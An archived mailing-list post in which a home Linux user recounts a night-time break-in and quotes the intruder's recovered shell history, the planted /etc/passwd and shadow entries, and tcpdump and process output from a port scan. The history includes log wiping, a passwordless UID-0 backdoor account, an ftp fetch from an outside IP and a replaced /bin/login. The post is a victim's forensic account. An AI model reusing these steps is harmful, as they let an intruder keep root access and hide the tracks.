I'm sending this here mainly for archival reasons... this is
probably mostly interesting to Unix geeks.
Around 3:41am yesterday, someone cracked into my home machine
(connected full-time via cablemodem) and used it to probe another
network. I was awake and working, and noticed something was up by
the unusual pattern of my cablemodem's lights.
I made the mistake of killing the attacker's connection before
securing my machine, then he/she apparently logged back in and
did something nasty, because my desktop disappeared and I couldn't
regain control by switching to a text console... had to reboot.
(first reboot since I installed the machine in January. :)
Of course, as soon as the screen went black I ripped out the
ethernet cable from the back of the machine, somewhat freaked out
at this point. ;)
After rebooting, I couldn't log in because my /bin/login had been
replaced with something else. So I reinstalled most of my base
system (which I would've done anyway, since I didn't know what
he/she had messed with), and compiled and installed ssh.
That'll teach me to run a system without software autoupgrades
and/or a firewall installed...
Here are more details from a message I sent to a list at work
yesterday:
> The first thing he did was rm -rf /var/log , so there isn't much
> of a log. I found this in /root/.bash_history:
>
> cd /var/
> rm -rf log
> users
> vhosts
> uptime
> exit
> w
> /usr/sbin/adduser mat
> passwd mat
> rm -rf /var/log/*
> exit
> cd /etc/
> ls
> pico inetd.conf
> rm -rf /var/log/*
> exit
> mv login /bin
> dir
> w
> mv login /bin
> chmod 777 login
> mv login /bin
> pico login
> cd /bin
> dir
> ftp 207.170.22.77
> dir
> pico login
> rm login
> cd /tmp
> mv login /bin
> chmod +x /bin/login
> exit
>
> And he created some new entries in /etc/passwd and /etc/shadow:
>
> own:x:0:0::/root:/bin/bash
> adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash
> mat:x:12818:12818::/home/mat:/bin/bash
>
> own::10865:0:99999:7:-1:-1:134538460
> adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
> mat:$1$YR62NIer$Y7gtqjzDiT5ic1TLmEi5u/:11056:0:99999:7:-1:-1:134550500
>
> /home/mat doesn't have much of interest afterwards:
>
> root@devo: mat> ll
> total 32
> drwx------ 2 mat mat 4096 Apr 9 16:54 ./
> drwxr-xr-x 18 root root 4096 Apr 10 03:53 ../
> -rw-r--r-- 1 mat mat 1422 Apr 9 16:22 .Xdefaults
> -rw------- 1 mat mat 27 Apr 9 22:04 .bash_history
> -rw-r--r-- 1 mat mat 24 Apr 9 16:22 .bash_logout
> -rw-r--r-- 1 mat mat 230 Apr 9 16:22 .bash_profile
> -rw-r--r-- 1 mat mat 124 Apr 9 16:22 .bashrc
> -rw-r--r-- 1 mat mat 3394 Apr 9 16:22 .screenrc
>
> /home/mat/.bash_history contains:
>
> Is
> Ls
> ls
> ftp
> w
> ls
> cd /root
>
> When I noticed some strange network traffic (from blinking lights
> on my cablemodem), I ran tcpdump to see what's up:
>
> 04:03:10 <ger-home> e-t, still there?
> 04:04:02 <ger-home> there's a ton of traffic coming into
> [sic] my home machine... pings or probes or something.
> 04:04:16 <ger-home> 04:02:17.024287 >
> r95aag008980.sbo-smr.ma.cable.rcn.com.2532 >
> mnc-esp.ind.net.domain: S 548284530:548284530(0) win 32120
> <mss 1460,sackOK,timestamp 614510582 0,nop,wscale 0> (DF)
> 04:04:17 <ger-home> 04:02:17.024350 >
> r95aag008980.sbo-smr.ma.cable.rcn.com.2533 >
> mnc-axis.ind.net.domain: S 546972039:546972039(0) win 32120
> <mss 1460,sackOK,timestamp 614510582 0,nop,wscale 0> (DF)
> 04:04:55 <ger-home> yikes!
> 04:04:58 <ger-home> root 5228 0.0 0.6 1684 808
> pts/24 S 03:56 0:00 sh ./ibind.sh 199.8
> 04:04:58 <ger-home> root 5238 98.7 0.3 1076 392
> pts/24 R 03:56 8:21 ./pscan 199.8 53
> 04:05:35 <ger-home> and I just noticed my /var/log
> disappeared... crap
> 04:05:41 <ger-home> (earlier tonight I noticed, I mean)
> 04:05:59 <ger-home> crap crap crap... I've been hacked
>
> 04:08:37 <-- ger-home has quit (EOF From client)
>
> [ reinstalled my base system, compiled and re-installed ssh ]
>
> 05:41:51 --> ger-home (
[email protected]) has joined &sysreq
> 05:43:13 <ger-home> what a $#%& pain
> 05:43:46 <ger-home> I killed the cracker's connection to my
> machine, and he logged back in and killed my session...
> had to reboot.
> 05:43:58 <ger-home> and he replaced my /bin/login with
> something else, ...
>
--
Gerald Oskoboiny <
[email protected]>
http://impressive.net/people/gerald/